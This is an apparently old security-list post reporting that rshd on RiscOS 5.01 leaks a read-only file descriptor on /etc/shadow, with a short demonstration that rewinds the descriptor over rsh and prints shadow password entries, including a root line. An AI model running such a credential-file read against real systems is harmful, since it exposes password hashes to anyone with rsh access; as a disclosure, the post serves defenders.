BUG (and exploit): RiscOS 5.01 rshd has FD leaks...

[jeremy () suede sw oz au (Jeremy Fitzhardinge)]

Hi all,

When rsh'ing to a RiscOS 5.01 machine, the process being run has a file
descriptor open RO on the shadow password file.  A simple program to
seek it back to 0 and copy will reveal the encrypted passwords to
anyone who can rsh to the machine.

suite is a Mips RiscOS 5.01 machine; suede is a Solaris box

: suite:4; ls -li /etc/shadow
  4409 -r--------  1 root         4072 Aug 11 08:48 /etc/shadow

: suede:21; rsh suite t/openfd
21 Dev (33, 0), ino 2679, type character special
20 Dev (33, 0), ino 2679, type character special
8 Dev (255, 255), ino 13566, type FIFO
7 Dev (33, 0), ino 4409, type regular file      *****
4 Dev (33, 0), ino 4409, type regular file      *****
2 Dev (255, 255), ino 13566, type FIFO
1 Dev (0, 0), ino 0, type Unknown
Numeric type: 0
0 Dev (0, 0), ino 0, type Unknown
Numeric type: 0

(seek0 just seeks its stdin to offset 0)
: suede:21; rsh suite '(t/seek0; cat)</dev/fd/7'
root:oHnoyOuDOnt:9334::::::
setup:*NOLOGIN*:8603::::::
sysadm:*NOLOGIN*:8603::::::
daemon:*NOLOGIN*:8603::::::
bin:*NOLOGIN*:8603::::::
...


I'm curious about the pipes as well; what are they to?  I think the "unknown"
file descriptors are sockets; fstat doesn't seem to cope with them.

        J